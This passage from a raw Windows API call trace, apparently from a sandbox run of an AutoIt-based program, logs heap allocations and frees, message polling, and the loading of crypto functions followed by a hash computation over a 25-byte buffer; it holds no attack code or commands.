hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0184.189] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0184.190] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.190] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.190] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.191] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0184.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x90d440, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.192] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContext") returned 0x0 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0184.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x90d440, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.193] GetProcAddress (hModule=0x74f20000, lpProcName="CryptAcquireContextA") returned 0x74f291dd [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0184.193] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0184.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.195] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0184.195] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.195] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.195] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.196] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0184.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.196] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.196] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.196] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.196] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.196] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.197] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.197] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0184.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.198] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.198] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.198] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.199] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.199] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.200] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.200] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0184.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.200] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0184.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0184.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0184.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.229] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.229] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 